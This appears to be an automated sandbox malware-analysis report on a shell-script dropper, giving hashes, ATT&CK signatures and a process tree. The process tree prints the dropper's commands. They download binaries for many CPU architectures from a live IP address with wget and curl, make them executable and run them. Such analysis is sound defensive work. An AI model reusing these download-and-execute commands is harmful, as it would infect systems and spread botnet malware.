Analysis
-
max time kernel
28s -
max time network
29s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/11/2024, 08:50
Static task
static1
Behavioral task
behavioral1
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
-
Size
1KB
-
MD5
0b5a60057fc9d9ce95ba5cdaab501e68
-
SHA1
879040e7114865f81dbd3f2fb41409e0cb3b8966
-
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
-
SHA512
d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 819 chmod 742 chmod 755 chmod 764 chmod 799 chmod 845 chmod 750 chmod 783 chmod 825 chmod 830 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 744 3AvA /tmp/3AvA 751 3AvA /tmp/3AvA 756 3AvA /tmp/3AvA 765 3AvA /tmp/3AvA 784 3AvA /tmp/3AvA 800 3AvA /tmp/3AvA 820 3AvA /tmp/3AvA 826 3AvA /tmp/3AvA 831 3AvA /tmp/3AvA 847 3AvA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 749 cat 751 3AvA 745 wget 747 curl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh File opened for modification /tmp/IGxModz.arm4 curl File opened for modification /tmp/IGxModz.arm7 curl File opened for modification /tmp/IGxModz.ppc curl File opened for modification /tmp/IGxModz.sh4 curl File opened for modification /tmp/IGxModz.x86 curl File opened for modification /tmp/IGxModz.mips curl File opened for modification /tmp/IGxModz.mpsl curl File opened for modification /tmp/IGxModz.arm5 curl File opened for modification /tmp/IGxModz.arm6 curl File opened for modification /tmp/IGxModz.m68k curl
Processes
-
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh1⤵
- Writes file to tmp directory
PID:715 -
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.x862⤵PID:719
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/catcat IGxModz.x862⤵PID:740
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mips2⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/catcat IGxModz.mips2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:751
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mpsl2⤵PID:752
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/catcat IGxModz.mpsl2⤵PID:754
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm42⤵PID:757
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/catcat IGxModz.arm42⤵PID:763
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm52⤵PID:768
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/catcat IGxModz.arm52⤵PID:781
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:784
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm62⤵PID:785
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/catcat IGxModz.arm62⤵PID:797
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm72⤵PID:802
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/catcat IGxModz.arm72⤵PID:818
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:820
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.ppc2⤵PID:821
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/catcat IGxModz.ppc2⤵PID:824
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:826
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.m68k2⤵PID:827
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/catcat IGxModz.m68k2⤵PID:829
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:831
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.sh42⤵PID:832
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/catcat IGxModz.sh42⤵PID:844
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:847
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
276B
MD5960b4fa9d5383373f0a1ea04929df01b
SHA1f78054d817db7742162a706b5d9f1fedcdf21140
SHA2563e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA5122d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f